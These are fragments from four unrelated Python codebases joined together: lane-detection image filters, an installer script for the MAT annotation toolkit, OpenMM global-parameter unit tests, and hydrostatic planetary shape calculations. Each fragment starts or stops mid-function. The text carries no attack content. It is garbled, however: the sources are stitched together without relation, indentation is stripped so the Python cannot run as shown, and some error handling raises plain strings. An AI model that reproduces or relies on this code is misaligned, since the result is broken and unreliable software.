superPosedImageWithBrokenLines = weighted_img(lines_CurrentWorkingImage, channel2Image, α=0.8, β=1., λ=0.)
superPosedImageWithBrokenLines[:, :, 2] = superPosedImageWithBrokenLines[:, :, 0]
superPosedImageWithBrokenLines[:, :, 0] = channel2Image[:, :, 0]
superPosedImageWithBrokenLines[:, :, 1] = channel2Image[:, :, 1]
else:
return img
return superPosedImageWithBrokenLines
def dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):
# Apply the following steps to img
# 1) Convert to grayscale
#gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
gray = img[:, :, 2]
returnedImage = np.zeros_like(img)
# 2) Take the gradient in x and y separately
sobel_x = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
sobel_y = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)
# 3) Take the absolute value of the x and y gradients
abs_sobel_x = np.absolute(sobel_x)
abs_sobel_y = np.absolute(sobel_y)
# 4) Use np.arctan2(abs_sobely, abs_sobelx) to calculate the direction of the gradient
dirGradients = np.arctan2(abs_sobel_y, abs_sobel_x)
#maxGradient = np.max(dirGradients)
# 5) Create a binary mask where direction thresholds are met
dirGradientsbinary = np.zeros_like(dirGradients)
dirGradientsbinary[(dirGradients >= thresh[0]) & (dirGradients <= thresh[1])] = 255
returnedImage[:, :, 0] = dirGradientsbinary
returnedImage[:, :, 1] = dirGradientsbinary
returnedImage[:, :, 2] = dirGradientsbinary
return returnedImage
def get_hog_features(img, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=True):
if vis == True: # | |
# Copyright (C) 2007 - 2009 The MITRE Corporation. See the toplevel
# file LICENSE for license terms.
# This script does the real work of the installation. The first
# thing it needs to check is whether it was invoked with Python
# 2.6 or later. Notice that this is NOT an executable Python
# script; it must be called as "python install.py".
# During installation, it will be called from install.sh, but it
# shouldn't be required. So let's just be absolutely sure.
import sys, glob
if not hasattr(sys, "version_info"):
print >> sys.stderr, "Python 2.x required (2.6 or later)."
sys.exit(1)
majV, minV = sys.version_info[:2]
if majV != 2 or (minV < 6):
print >> sys.stderr, "Python 2.x required (2.6 or later)."
sys.exit(1)
if sys.platform == "cygwin":
print >> sys.stderr, "Cygwin is no longer supported, because Cygwin Python is distributed without sqlite bindings."
sys.exit(1)
# OK, we know we've got the right version of Python.
import os, re, shutil
# This file is intended to be installed at the root of the
# package.
MAT_BUNDLE_HOME = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.join(MAT_BUNDLE_HOME, "src", "MAT", "build"))
import MAT_distutils
#
# Utilities
#
def notify(s):
print "#\n# %s\n#\n" % s
from MAT_distutils import shellOutput, MATManifest, VersionExtractor, chooseExecutable
P_AS_FILE, P_AS_DIR = range(2)
def checkOnPlatform(path, plat, mode = P_AS_FILE):
if (mode is P_AS_FILE and not os.path.isfile(path)) or \
(mode is P_AS_DIR and not os.path.isdir(path)):
print "%s not found; your %s installation is incomplete." % (executable, plat)
sys.exit(1)
else:
return path
# There are three different options worth considering here:
# sys.platform = win32
# other
#
# Toplevel
#
import getopt
def Usage():
print "Usage: install.py [ --no_terminator_prompt ]"
sys.exit(1)
opts, args = getopt.getopt(sys.argv[1:], "", ["no_terminator_prompt"])
if args:
Usage()
TERMINATOR_PROMPT = True
for k, v in opts:
if k == "--no_terminator_prompt":
TERMINATOR_PROMPT = False
else:
Usage()
# On MacOS X and Windows, we're going to use Terminator.
# Let's see if we can work that in. The idea is not to have to
# run X11 on either platform.
# Update: the tabbed terminal is now optional.
# Here are the settings we need.
# PYTHONBIN= sys.executable in Python
# TABBED_TERMINAL_BIN= <bundle>/build/mrxvt/bin/mrxvt on Unix
# JSON_PYTHONLIB= <bundle>/build/simplejson
# YUI_JS_LIB= <bundle>/src/<whatever the dir is in the manifest>
# CHERRYPY_PYTHONLIB = <bundle>/src/<cherrypydir>
# MUNKRES_PYTHONLIB = <bundle>src/<munkresdir>
# In this table, we have the settings which are make-or-break; if
# the specified file isn't in the specified location, something is
# very, very wrong.
import glob
KNOWN_PLATFORMS = {"Solaris": {},
"Linux": {},
"MacOS X Tiger": {"GCC": "/usr/bin/gcc",
"GNU_MAKE": "/usr/bin/make"},
"MacOS X Leopard": {"GCC": "/usr/bin/gcc",
"GNU_MAKE": "/usr/bin/make",
"JAVA_HOME_CANDIDATES": glob.glob("/System/Library/Frameworks/JavaVM.framework/Versions/*/Home/bin")},
"MacOS X Snow Leopard": {"GCC": "/usr/bin/gcc",
"GNU_MAKE": "/usr/bin/make"},
'Windows': {'GCC': None,
'GNU_MAKE': None,
"JAVA_HOME_CANDIDATES":
glob.glob("c:/Program Files/Java/*/bin") + glob.glob("c:/Program Files (x86)/Java/*/bin")
}
}
THIS_PLATFORM = None
COMPILE_SIMPLEJSON = True
if sys.platform == "win32":
THIS_PLATFORM = "Windows"
elif sys.platform == "linux2":
THIS_PLATFORM = "Linux"
elif sys.platform == "sunos5":
THIS_PLATFORM = "Solaris"
elif sys.platform == "darwin":
# Gotta check uname. That's the only way, apparently.
e = VersionExtractor("(?P<major>[0-9]+)(\.(?P<minor>[0-9]+)(\.(?P<subminor>[0-9]+))?)?",
"%s -r", ("major", "minor", "subminor"))
version = e.extractVersion("uname")
if e.atLeastVersion((9,), version):
if e.atLeastVersion((10,), version):
THIS_PLATFORM = "MacOS X Snow Leopard"
if minV < 6:
# Because 10.4 build support is what simplejson wants, and
# it's not available by default in Python 2.6, we can't try to compile
# simplejson - just copy it.
COMPILE_SIMPLEJSON = False
else:
THIS_PLATFORM = "MacOS X Leopard"
else:
# Not really, but close enough for the moment.
THIS_PLATFORM = "MacOS X Tiger"
else:
print "This platform is not supported."
sys.exit(1)
notify("Reading manifest...")
manifestDir = MATManifest(MAT_BUNDLE_HOME)
manifestDir.load()
# Let's use a dictionary.
# Gotta find the dependency jar.
Settings = {
"PYTHONBIN": sys.executable,
"YUI_JS_LIB": os.path.join(MAT_BUNDLE_HOME, "src", manifestDir["yui_dir"]),
"CHERRYPY_PYTHONLIB": os.path.join(MAT_BUNDLE_HOME, "src", manifestDir["cherrypy"]),
"MUNKRES_PYTHONLIB": os.path.join(MAT_BUNDLE_HOME, "src", manifestDir["munkres"]),
"JCARAFE_JAR": glob.glob(os.path.join(MAT_BUNDLE_HOME, "src", manifestDir["jcarafe"], "*-bin.jar"))[0]
}
UnsavedSettings = []
# We already know we have Python.
# First thing: check for Java 1.6 or later. We want to find the
# latest version that satisfies the criteria.
notify("Checking for Java...")
javaBin = chooseExecutable("Java, version 1.6.0_04 or later",
execName = "java",
execExtraDirs = KNOWN_PLATFORMS[THIS_PLATFORM].get("JAVA_HOME_CANDIDATES"),
versionChecker = ('java version "(?P<major>[0-9]+)(\.(?P<minor>[0-9]+)(\.(?P<subminor>[0-9]+)(_(?P<subsubminor>[0-9]+))?)?)?"', '"%s" -version 2>&1', ("major", "minor", "subminor", "subsubminor"), (1, 6, 0, 4), None),
failureString = "is not a recent enough version of Java.",
execFailureString = "No appropriate version of Java found. Exiting.",
exitOnFailure = True)
Settings["JAVA_BIN"] = javaBin
# Tabbed terminal.
TERMINATOR_FOUND_PROMPT = """The Terminator tabbed terminal application is
not installed in its expected location at /Applications/Terminator.app.
This application is not required for this package to run, but can be a convenient
tool when used via src/MAT/bin/MATWeb.
You may have Terminator installed somewhere else, or you may not have
installed it yet. If you have not installed Terminator, you can find an
installation bundle in for it in the 'external' subdirectory of this package;
please install it and then return to this installation.
"""
TERMINATOR_NOTFOUND_PROMPT = """The Terminator tabbed terminal application is
not installed in its expected location at /Applications/Terminator.app.
This application is not required for this package to run, but can be a convenient
tool when used via src/MAT/bin/MATWeb. No installation package for
Terminator has been provided with this distribution.
"""
# Tabbed terminal is not required, and may not be in the tarball.
USE_MRXVT = False
if THIS_PLATFORM in ['Linux', 'Solaris']:
if manifestDir.has_key('mrxvt'):
if re.search("\s", MAT_BUNDLE_HOME):
# mrxvt will not build when there's a space in the path.
print "Warning: skipping build of mrxvt tabbed terminal because the MAT install path"
print "contains whitespace. If you want to use mrxvt, unpack the MAT tarball"
print "in a directory path which has no whitespace in it."
else:
Settings["TABBED_TERMINAL_BIN"] = os.path.join(MAT_BUNDLE_HOME, "build", "mrxvt", "bin", "mrxvt")
USE_MRXVT = True
elif THIS_PLATFORM in ['MacOS X Tiger', 'MacOS X Leopard', "MacOS X Snow Leopard"]:
# Terminator supposedly works on Windows and MacOS X. We've
# been working with the developers to fix some bugs in it.
appBin = "/Applications/Terminator.app"
if not manifestDir.has_key("terminator"):
tPrompt = TERMINATOR_NOTFOUND_PROMPT
else:
tPrompt = TERMINATOR_FOUND_PROMPT
def terminatorFilterFn(v):
return os.path.isdir(v) and os.path.isfile(os.path.join(v, "Contents/MacOS/Terminator"))
appBin = chooseExecutable("Terminator", execCandidates = ["/Applications/Terminator.app",
"/Applications/Terminator/Terminator.app"],
filterFn = lambda v: os.path.isdir(v),
failureString = "is not a Mac application.",
promptIntro = tPrompt,
execPrompt = "Please provide the path to the Terminator application, or hit <return> to skip: ")
if appBin:
Settings["TABBED_TERMINAL_BIN"] = os.path.join(appBin, "Contents/MacOS/Terminator")
else:
print "No path to the Terminator application specified. Skipping."
elif THIS_PLATFORM in ['Windows']:
if manifestDir.has_key('console'):
Settings['TABBED_TERMINAL_BIN'] = os.path.join(MAT_BUNDLE_HOME, "external", manifestDir['console'], "Console2", "Console.exe")
# Check gcc, GNU make. I want GCC for simplejson, for which it's not strictly necessary.
# I want GCC and GNU_MAKE for mrxvt, but if it's missing, I'll just skip mrxvt. And
# some of the plugins may want them too. So don't exit on failure.
if THIS_PLATFORM != "Windows":
notify("Checking for GNU make...")
if THIS_PLATFORM in ["MacOS X Tiger", "MacOS X Leopard",
"MacOS X Snow Leopard"]:
GNU_MAKE = chooseExecutable("GNU make",
execCandidates = [KNOWN_PLATFORMS[THIS_PLATFORM]["GNU_MAKE"]],
execFailureString = "No appropriate version of GNU make found. Some steps of your build may be skipped, or your build may fail.")
else:
GNU_MAKE = chooseExecutable("GNU make, version 3.79.1 or later",
execName = "make",
versionChecker = ("GNU Make( version)? (?P<major>[0-9]+)(\.(?P<minor>[0-9]+)(\.(?P<subminor>[0-9]+))?)?", "%s --version 2>/dev/null", ("major", "minor", "subminor"), (3, 79, 1), None),
failureString = "is not a recent enough version of GNU make.",
execFailureString = "No appropriate version of GNU make found. Some steps of your build may be skipped, or your build may fail.")
UnsavedSettings.append(("GNU make", GNU_MAKE))
notify("Checking for gcc...")
if THIS_PLATFORM in ["MacOS X Tiger", "MacOS X Leopard",
"MacOS X Snow Leopard"]:
GCC = chooseExecutable("gcc",
execCandidates = [KNOWN_PLATFORMS[THIS_PLATFORM]["GCC"]],
execFailureString = "No appropriate version of gcc found. Some steps of your build may be skipped, or your build may fail.")
else:
GCC = chooseExecutable("gcc, version 3 or later",
execName = "gcc",
versionChecker = ("gcc version (?P<major>[0-9]+)(\.(?P<minor>[0-9]+)(\.(?P<subminor>[0-9]+))?)?", "%s -v 2>&1", ("major", "minor", "subminor"), (3,), None),
failureString = "is not a recent enough version of gcc.",
execFailureString = "No appropriate version of gcc found. Some steps of your build may be skipped, or your build may fail.")
UnsavedSettings.append(("GCC", GCC))
# Finally, let's see whether we should set up psutil.
if manifestDir.has_key("psutil"):
# This may very well fail, because there's no GCC.
# Don't enable it by default; just make it available.
Settings["PSUTIL_PYTHONLIB"] = os.path.join(MAT_BUNDLE_HOME, "build", "psutil", "lib", "python")
else:
GCC = GNU_MAKE = None
notify("Settings:")
padding = max(map(len, Settings.keys() + [x[0] for x in UnsavedSettings]))
for k, v in UnsavedSettings + Settings.items():
s | |
{'parameters_name_suffix': 'suffix'},
{'parameters_name_suffix': 'suffix', 'lambda_angles': 1.0},
{'parameters_name_suffix': 'suffix', 'lambda_sterics': 0.5, 'lambda_angles': 0.5}]
for test_kwargs in test_cases:
state = MyState(**test_kwargs)
# Check which parameters are defined/undefined in the constructed state.
for parameter in MyState._get_controlled_parameters():
# Store whether parameter is defined before appending the suffix.
is_defined = parameter in test_kwargs
# The "unsuffixed" parameter should not be controlled by the state.
if 'parameters_name_suffix' in test_kwargs:
with nose.tools.assert_raises_regexp(AttributeError, 'state does not control'):
getattr(state, parameter)
# The state exposes a "suffixed" version of the parameter.
state_attribute = parameter + '_' + test_kwargs['parameters_name_suffix']
else:
state_attribute = parameter
# Check if parameter should is defined or undefined (i.e. set to None) as expected.
err_msg = 'Parameter: {} (Test case: {})'.format(parameter, test_kwargs)
if is_defined:
assert getattr(state, state_attribute) == test_kwargs[parameter], err_msg
else:
assert getattr(state, state_attribute) is None, err_msg
def test_from_system_constructor(self):
"""Test GlobalParameterState.from_system constructor."""
# A system exposing no global parameters controlled by the state raises an error.
with nose.tools.assert_raises_regexp(GlobalParameterError, 'no global parameters'):
GlobalParameterState.from_system(openmm.System())
system = self.diatomic_molecule_ts.system
state = ParameterStateExample.from_system(system)
state_suffix = ParameterStateExample.from_system(system, parameters_name_suffix='mysuffix')
for parameter_name, parameter_value in self.parameters_default_values.items():
if 'suffix' in parameter_name:
controlling_state = state_suffix
noncontrolling_state = state
else:
controlling_state = state
noncontrolling_state = state_suffix
err_msg = '{}: {}'.format(parameter_name, parameter_value)
assert getattr(controlling_state, parameter_name) == parameter_value, err_msg
with nose.tools.assert_raises(AttributeError):
getattr(noncontrolling_state, parameter_name), parameter_name
def test_parameter_validator(self):
"""Test GlobalParameterState constructor behave as expected."""
class MyState(GlobalParameterState):
lambda_bonds = GlobalParameterState.GlobalParameter('lambda_bonds', standard_value=1.0)
@lambda_bonds.validator
def lambda_bonds(self, instance, new_value):
if not (0.0 <= new_value <= 1.0):
raise ValueError('lambda_bonds must be between 0.0 and 1.0')
return new_value
# Create system with incorrect initial parameter.
system = self.diatomic_molecule_ts.system
system.getForce(0).setGlobalParameterDefaultValue(0, 2.0) # lambda_bonds
system.getForce(1).setGlobalParameterDefaultValue(0, -1.0) # lambda_bonds_mysuffix
for suffix in [None, 'mysuffix']:
# Raise an exception on init.
with nose.tools.assert_raises_regexp(ValueError, 'must be between'):
MyState(parameters_name_suffix=suffix, lambda_bonds=-1.0)
with nose.tools.assert_raises_regexp(ValueError, 'must be between'):
MyState.from_system(system, parameters_name_suffix=suffix)
# Raise an exception when properties are set.
state = MyState(parameters_name_suffix=suffix, lambda_bonds=1.0)
parameter_name = 'lambda_bonds' if suffix is None else 'lambda_bonds_' + suffix
with nose.tools.assert_raises_regexp(ValueError, 'must be between'):
setattr(state, parameter_name, 5.0)
def test_equality_operator(self):
"""Test equality operator between GlobalParameterStates."""
state1 = ParameterStateExample(lambda_bonds=1.0)
state2 = ParameterStateExample(lambda_bonds=1.0)
state3 = ParameterStateExample(lambda_bonds=0.9)
state4 = ParameterStateExample(lambda_bonds=0.9, gamma=1.0)
state5 = ParameterStateExample(lambda_bonds=0.9, parameters_name_suffix='suffix')
state6 = ParameterStateExample(parameters_name_suffix='suffix', lambda_bonds=0.9, gamma=1.0)
assert state1 == state2
assert state2 != state3
assert state3 != state4
assert state3 != state5
assert state4 != state6
assert state5 != state6
assert state6 == state6
# States that control more variables are not equal.
class MyState(ParameterStateExample):
extra_parameter = GlobalParameterState.GlobalParameter('extra_parameter', standard_value=1.0)
state7 = MyState(lambda_bonds=0.9)
assert state3 != state7
# States defined by global parameter functions are evaluated correctly.
state8 = copy.deepcopy(state1)
state8.set_function_variable('lambda1', state1.lambda_bonds*2.0)
state8.lambda_bonds = GlobalParameterFunction('lambda1 / 2')
assert state1 == state8
state8.set_function_variable('lambda1', state1.lambda_bonds)
assert state1 != state8
def test_apply_to_system(self):
"""Test method GlobalParameterState.apply_to_system()."""
system = self.diatomic_molecule_ts.system
state = ParameterStateExample.from_system(system)
state_suffix = ParameterStateExample.from_system(system, parameters_name_suffix='mysuffix')
expected_system_values = copy.deepcopy(self.parameters_default_values)
def check_system_values():
state, state_suffix = self.read_system_state(system)
for parameter_name, parameter_value in expected_system_values.items():
err_msg = 'parameter: {}, expected_value: {}'.format(parameter_name, parameter_value)
if 'suffix' in parameter_name:
assert getattr(state_suffix, parameter_name) == parameter_value, err_msg
else:
assert getattr(state, parameter_name) == parameter_value, err_msg
# Test precondition: all parameters have the expected default value.
check_system_values()
# apply_to_system() modifies the state.
state.lambda_bonds /= 2
expected_system_values['lambda_bonds'] /= 2
state_suffix.lambda_bonds_mysuffix /= 2
expected_system_values['lambda_bonds_mysuffix'] /= 2
for s in [state, state_suffix]:
s.apply_to_system(system)
check_system_values()
# Raise an error if an extra parameter is defined in the system.
state.gamma = None
err_msg = 'The system parameter gamma is not defined in this state.'
with nose.tools.assert_raises_regexp(GlobalParameterError, err_msg):
state.apply_to_system(system)
# Raise an error if an extra parameter is defined in the state.
state_suffix.gamma_mysuffix = 2.0
err_msg = 'Could not find global parameter gamma_mysuffix in the system.'
with nose.tools.assert_raises_regexp(GlobalParameterError, err_msg):
state_suffix.apply_to_system(system)
def test_check_system_consistency(self):
"""Test method GlobalParameterState.check_system_consistency()."""
system = self.diatomic_molecule_ts.get_system(remove_thermostat=True)
def check_not_consistency(states):
for s in states:
with nose.tools.assert_raises_regexp(GlobalParameterError, 'Consistency check failed'):
s.check_system_consistency(system)
# A system is consistent with itself.
state, state_suffix = self.read_system_state(system)
for s in [state, state_suffix]:
s.check_system_consistency(system)
# Raise error if System defines global parameters that are undefined in the state.
state, state_suffix = self.read_system_state(system)
state.gamma = None
state_suffix.lambda_bonds_mysuffix = None
check_not_consistency([state, state_suffix])
# Raise error if state defines global parameters that are undefined in the System.
state, state_suffix = self.read_system_state(system)
state_suffix.gamma_mysuffix = 1.0
check_not_consistency([state_suffix])
# Raise error if system has different lambda values.
state, state_suffix = self.read_system_state(system)
state.lambda_bonds /= 2
state_suffix.lambda_bonds_mysuffix /=2
check_not_consistency([state, state_suffix])
def test_apply_to_context(self):
"""Test method GlobalParameterState.apply_to_context."""
system = self.diatomic_molecule_ts.system
integrator = openmm.VerletIntegrator(1.0*unit.femtosecond)
context = create_default_context(self.diatomic_molecule_ts, integrator)
def check_not_applicable(states, error, context):
for s in states:
with nose.tools.assert_raises_regexp(GlobalParameterError, error):
s.apply_to_context(context)
# Raise error if the Context defines global parameters that are undefined in the state.
state, state_suffix = self.read_system_state(system)
state.lambda_bonds = None
state_suffix.lambda_bonds_mysuffix = None
check_not_applicable([state, state_suffix], 'undefined in this state', context)
# Raise error if the state defines global parameters that are undefined in the Context.
state, state_suffix = self.read_system_state(system)
state_suffix.gamma_mysuffix = 2.0
check_not_applicable([state_suffix], 'Could not find parameter', context)
# Test-precondition: Context parameters are different than the value we'll test.
tested_value = 0.2
for parameter_value in context.getParameters().values():
assert parameter_value != tested_value
# Correctly sets Context's parameters.
state, state_suffix = self.read_system_state(system)
state.lambda_bonds = tested_value
state.gamma = tested_value
state_suffix.lambda_bonds_mysuffix = tested_value
for s in [state, state_suffix]:
s.apply_to_context(context)
for parameter_name, parameter_value in context.getParameters().items():
if parameter_name in s._parameters:
assert parameter_value == tested_value
del context
def test_standardize_system(self):
"""Test method GlobalParameterState.standardize_system."""
system = self.diatomic_molecule_ts.system
standard_value = _GLOBAL_PARAMETER_STANDARD_VALUE # Shortcut.
def check_is_standard(states, is_standard):
for s in states:
for parameter_name in s._get_controlled_parameters(s._parameters_name_suffix):
parameter_value = getattr(s, parameter_name)
err_msg = 'Parameter: {}; Value: {};'.format(parameter_name, parameter_value)
if parameter_value is not None:
assert (parameter_value == standard_value) is is_standard, err_msg
# Test pre-condition: The system is not in the standard state.
system.getForce(0).setGlobalParameterDefaultValue(0, 0.9)
states = self.read_system_state(system)
check_is_standard(states, is_standard=False)
# Check that _standardize_system() sets all parameters to the standard value.
for state in states:
state._standardize_system(system)
states_standard = self.read_system_state(system)
check_is_standard(states_standard, is_standard=True)
def test_find_force_groups_to_update(self):
"""Test method GlobalParameterState._find_force_groups_to_update."""
system = self.diatomic_molecule_force_groups_ts.system
integrator = openmm.VerletIntegrator(2.0*unit.femtoseconds)
# Test cases are (force_groups, force_groups_suffix)
test_cases = [
([0], [0, 0]),
([1], [5, 5]),
([9], [4, 2])
]
for test_case in test_cases:
for i, force_group in enumerate(test_case[0] + test_case[1]):
system.getForce(i).setForceGroup(force_group)
states = self.read_system_state(system)
context = openmm.Context(system, copy.deepcopy(integrator))
# No force group should be updated if we don't change the global parameter.
for state, force_groups in zip(states, test_case):
assert state._find_force_groups_to_update(context, state, memo={}) == set()
# Change the lambdas one by one and check that the method
# recognizes that the force group energy must be updated.
current_state = copy.deepcopy(state)
for parameter_name in state._get_controlled_parameters(state._parameters_name_suffix):
# Check that the system defines the global variable.
parameter_value = getattr(state, parameter_name)
if parameter_value is None:
continue
# Change the current state.
setattr(current_state, parameter_name, parameter_value / 2)
assert state._find_force_groups_to_update(context, current_state, memo={}) == set(force_groups)
setattr(current_state, parameter_name, parameter_value) # Reset current state.
del context
def test_global_parameters_functions(self):
"""Test function variables and global parameter functions work correctly."""
system = copy.deepcopy(self.diatomic_molecule_ts.system)
state = ParameterStateExample.from_system(system)
# Add two function variables to the state.
state.set_function_variable('lambda', 1.0)
state.set_function_variable('lambda2', 0.5)
assert state.get_function_variable('lambda') == 1.0
assert state.get_function_variable('lambda2') == 0.5
# Cannot call an function variable as a supported parameter.
with nose.tools.assert_raises(GlobalParameterError):
state.set_function_variable('lambda_bonds', 0.5)
# Assign string global parameter functions to parameters.
state.lambda_bonds = GlobalParameterFunction('lambda')
state.gamma = GlobalParameterFunction('(lambda + lambda2) / 2.0')
assert state.lambda_bonds == 1.0
assert state.gamma == 0.75
# Setting function variables updates global parameter as well.
state.set_function_variable('lambda2', 0)
assert state.gamma == 0.5
# ---------------------------------------------------
# Integration tests with CompoundThermodynamicStates
# ---------------------------------------------------
def test_constructor_compound_state(self):
"""The GlobalParameterState is set on construction of the CompoundState."""
system = self.diatomic_molecule_ts.system
# Create a system state different than the initial.
composable_states = self.read_system_state(system)
for state in composable_states:
state.set_defined_parameters(0.222)
# CompoundThermodynamicState set the system state in the constructor.
compound_state = CompoundThermodynamicState(self.diatomic_molecule_ts, composable_states)
new_system_states = self.read_system_state(compound_state.system)
for state, new_state in zip(composable_states, new_system_states):
assert state == new_state
# Trying to set in the constructor undefined global parameters raise an exception.
composable_states[1].gamma_mysuffix = 2.0
err_msg = 'Could not find global parameter gamma_mysuffix in the system.'
with nose.tools.assert_raises_regexp(GlobalParameterError, err_msg):
CompoundThermodynamicState(self.diatomic_molecule_ts, composable_states)
def test_global_parameters_compound_state(self):
"""Global parameters setters/getters work in the CompoundState system."""
composable_states = self.read_system_state(self.diatomic_molecule_ts.system)
for state in composable_states:
state.set_defined_parameters(0.222)
compound_state = CompoundThermodynamicState(self.diatomic_molecule_ts, composable_states)
# Defined properties can be assigned and read, unless | |
i in range(1, ilith+1):
if m == 0:
b4[0, m, i] = 2. / 3. / np.sqrt(5.) * \
omega**2 * radius[i] * \
hlm[i].coeffs[0, l, m] * p402020
elif m == 1:
b4[0, m, i] = 2. / 3. / np.sqrt(5.) * \
omega**2 * radius[i] * \
hlm[i].coeffs[0, l, m] * p412021
elif m == 2:
b4[0, m, i] = 2. / 3. / np.sqrt(5.) * \
omega**2 * radius[i] * \
hlm[i].coeffs[0, l, m] * p422022
# --- do sine term ---
b = np.zeros(ilith+2)
if m != 0:
# Add contributions from degree 2 relief to degree 4.
if l == 4 and m <= 2:
b[1:ilith+1] = b4[1, m, 1:ilith+1]
for i in range(1, ilith+1):
b[i] -= gm * cminus[1, l, m] * (radius[i] / r_surface)**l \
/ r_surface
b[ilith+1] = gm * potential.coeffs[1, l, m] / r_ref - \
gm * cplus[1, l, m] * (r_surface / r_ref)**l / r_ref
# solve the linear equation A h = b
atemp = a.copy()
if tides:
for i in range(1, ilith+1):
atemp[i, i] += atides[1, i]
btemp = b.copy()
# note that the zero index is not used
lu, piv, x, info = lapack.dgesv(atemp[1:, 1:], btemp[1:])
if info != 0:
raise("lapack.dgesv did not exit properly: {:d}", info)
for i in range(1, ilith+1):
hlm[i].coeffs[1, l, m] = x[i-1]
# calculate b4 contribution
if l == 2:
for i in range(1, ilith+1):
if m == 1:
b4[1, m, i] = 2. / 3. / np.sqrt(5.) * \
omega**2 * radius[i] * \
hlm[i].coeffs[1, l, m] * p412021
elif m == 2:
b4[1, m, i] = 2. / 3. / np.sqrt(5.) * \
omega**2 * radius[i] * \
hlm[i].coeffs[1, l, m] * p422022
# Calculate potential at r_ref resulting from all interfaces below and
# including ilith
coeffs = np.zeros((2, lmax+1, lmax+1))
for i in range(1, ilith+1):
for l in range(1, lmax+1):
coeffs[:, l, :l+1] += hlm[i].coeffs[:, l, :l+1] * 4. * \
np.pi * drho[i] * radius[i]**2 * (radius[i] / r_ref)**l * \
g / gm / (2. * l + 1.)
clm_hydro = pysh.SHGravCoeffs.from_array(coeffs, gm=gm, r0=r_ref,
omega=omega)
return hlm, clm_hydro, mass_model
def HydrostaticShape(radius, rho, omega, gm, r_ref, rp=None, mp=None,
i_clm_hydro=None):
"""
Calculate the shape of hydrostatic relief in a rotating planet or moon,
along with the total gravitation potential. For the case of a moon in
synchronous rotation, optionally include the tidal potential.
Returns
-------
hlm : array of SHCoeffs class instances, size(n+1)
Array of SHCoeffs class instances of the spherical harmonic
coefficients of the hydrostatic relief at each interface.
clm_hydro : SHCoeffs class instance containing the gravitational potential
resulting from all hydrostatic interfaces. If i_clm_hydro is specified,
then the potential will include only interfaces beneath index
i_clm_hydro.
mass : float
Total mass of the planet, assuming a spherical shape and the provided
1D density profile.
Parameters
----------
radius : ndarray, float, size(n+1)
Radius of each density interface, where index 0 corresponds to the
center of the planet and n corresponds to the surface.
density : ndarray, float, size(n+1)
Density of layer i between radius[i] and radius[i+1]. The density
at index 0 is from the center of the planet to radius[1], whereas the
the density at index n should be zero.
omega : float
Angular rotation rate of the planet.
gm : float
GM of the planet.
r_ref : float
Refernce radius for output potential coefficients.
rp : float, optional, default = None
If specified, include the tidal potential acting on a synchronously
rotating moon, where rp is the average distance between the planet
and satellite.
mp : float, optional, default = None
The mass of the host planet, at a distance rp from the satellite.
i_clm_hydro : int, optional, default = None
If specified, calculate the gravitational potential clm_hydro resulting
from all interfaces below and including the radius index i_clm_hydro.
"""
tides = False
if rp is not None:
if mp is None:
raise ValueError('When including tides, both rp and mp must be ' +
'specified.')
tides = True
if mp is not None:
if rp is None:
raise ValueError('When including tides, both rp and mp must be ' +
'specified.')
tides = True
if len(radius) != len(rho):
raise('Length of radius and density must be the same.' +
'len(radius) = {:d}. len(density) = {:d}.'
.format(len(radius), len(rho)))
n = len(radius) - 1 # index of surface
lmax = 4
g = pysh.constants.G.value
hlm = [pysh.SHCoeffs.from_zeros(lmax) for i in range(n+1)]
clm_hydro = pysh.SHCoeffs.from_zeros(lmax)
for i in range(n+1):
hlm[i].coeffs[0, 0, 0] = radius[i]
# First determine the spherical harmonic coefficients of (Y20 Ylm)
# and for tides, (Y22 Ylm). We are only concerned with the coefficient
# that corresponds to lm, so for each lm, store only the lm component in
# the array cp20 and cp22.
sh20 = np.zeros((2, lmax+1, lmax+1))
sh22 = np.zeros((2, lmax+1, lmax+1))
sh = np.zeros((2, lmax+1, lmax+1))
cp20 = np.zeros((2, lmax+1, lmax+1))
cp22 = np.zeros((2, lmax+1, lmax+1))
sh20[0, 2, 0] = 1. # Y20
sh22[0, 2, 2] = 1. # Y22
for l in range(2, lmax+1):
for m in range(0, l+1):
sh[0, l, m] = 1.
coeffs = pysh.expand.SHMultiply(sh20, sh)
cp20[0, l, m] = coeffs[0, l, m]
if m != 0:
cp20[1, l, m] = cp20[0, l, m]
if l == 2 and m == 0:
p402020 = coeffs[0, 4, 0]
if l == 2 and m == 1:
p412021 = coeffs[0, 4, 1]
if l == 2 and m == 2:
p422022 = coeffs[0, 4, 2]
coeffs = pysh.expand.SHMultiply(sh22, sh)
cp22[0, l, m] = coeffs[0, l, m]
sh[0, l, m] = 0.
if m > 0:
sh[1, l, m] = 1.
coeffs = pysh.expand.SHMultiply(sh22, sh)
cp22[1, l, m] = coeffs[1, l, m]
sh[1, l, m] = 0.
# Calculate delta_rho
drho = np.zeros(n+1)
mass = np.zeros(n+1)
for i in range(1, n+1):
drho[i] = rho[i-1] - rho[i]
# Calculate matrix A and invert for relief.
a = np.zeros((n+1, n+1))
atides = np.zeros((2, n+1))
b4 = np.zeros((2, 3, n+1))
# Calculate cumulate mass function
for i in range(1, n+1):
if i == 1:
mass[1] = 4. * np.pi * radius[1]**3 * rho[0] / 3.
else:
mass[i] = mass[i-1] + 4. * np.pi * \
(radius[i]**3 - radius[i-1]**3) * rho[i-1] / 3.
mass_model = mass[n]
for l in range(2, lmax+1, 2):
for m in range(0, lmax+1):
for i in range(1, n+1): # zero index not computed
for j in range(1, n+1):
if i == j: # cp20 for sin and cosine terms are equal
a[i, j] = 4. * np.pi * g * drho[i] * radius[i] / \
(2. * l + 1.) - g * mass[i] / radius[i]**2 + \
(2./3.) * radius[i] * omega**2 * \
(1. - cp20[0, l, m] / np.sqrt(5.0))
elif j < i:
a[i, j] = 4. * np.pi * g * drho[j] * radius[j] * \
(radius[j] / radius[i])**(l+1) / (2. * l + 1.)
else:
a[i, j] = 4. * np.pi * g * drho[j] * radius[i] * \
(radius[i] / radius[j])**(l-1) / (2. * l + 1.)
if tides is True:
atides[0, i] = g * mp * radius[i] / rp**3 * (
- np.sqrt(5.) / 5. * cp20[0, l, m] +
np.sqrt(12./5.) * cp22[0, l, m] / 2.)
atides[1, i] = g * mp * radius[i] / rp**3 * (
- np.sqrt(5.) / 5. * cp20[1, l, m] +
np.sqrt(12./5.) * cp22[1, l, m] / 2.)
# --- do cosine term ---
